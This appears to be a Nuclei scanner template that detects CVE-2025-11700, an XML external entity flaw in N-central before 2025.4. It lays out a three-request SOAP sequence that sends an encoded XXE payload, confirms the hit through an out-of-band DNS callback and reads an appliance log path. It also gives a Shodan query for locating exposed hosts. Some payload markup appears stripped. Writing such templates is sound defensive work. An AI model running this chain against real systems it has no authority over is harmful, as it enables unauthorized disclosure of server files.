id: CVE-2025-11700 info: name: N-central - XML External Entities Injection author: DhiyaneshDK,horizon3ai severity: high description: | N-central versions < 2025.4 are vulnerable to an XML External Entities injection leading to information disclosure. impact: | Attackers can disclose sensitive information by exploiting XML External Entities injection. remediation: | Update to version 2025.4 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-11700 - https://github.com/horizon3ai/n-able_n-central_xxe_file_read/blob/main/ncentral_xxe_file_read.py metadata: verified: true max-request: 3 shodan-query: http.title:"N-central Login" tags: cve,cve2025,n-central,xxe,oast,oob,vkev flow: http(1) && http(2) && http(3) variables: rand: "{{to_lower(rand_text_alpha(10))}}" xxe_payload: |- %xxe; ]> {{rand}} http: - raw: - | POST /dms/services/ServerUI HTTP/2 Host: {{Hostname}} Content-Type: text/xml Soapaction: "" 3 matchers-condition: and matchers: - type: word words: - SessionID - sessionHelloResponse condition: and internal: true - type: status status: - 200 internal: true extractors: - type: regex part: body name: sessionid group: 1 regex: - ']*>(\d+)' - '(\d+)' - '(\d+)' internal: true - raw: - | POST /dms/services/ServerMMS HTTP/1.1 Host: {{Hostname}} SOAPAction: "" Content-Type: text/xml; charset=utf-8 {{sessionid}} NETWORK_CHECK_LOG {{base64(xxe_payload)}} matchers-condition: and matchers: - type: word words: - Ok - Msg condition: and internal: true - raw: - | POST /dms/services/ServerUI HTTP/1.1 Host: {{Hostname}} SOAPAction: "" Content-Type: text/xml; charset=utf-8 {{sessionid}} 1 /opt/nable/webapps/ROOT/applianceLog/network_check_log_3.log matchers: - type: word part: interactsh_protocol words: - dns # digest: 490a00463044022072fb917d872a56422ccb60872bb72b6cd41fce930b5062048f5fda94be4e037a02203fe611c0c20f257154d594cd038dec72cea1395bcad6b70087f5c6e1da634dcd:922c64590222798bb761d5b6d8e72950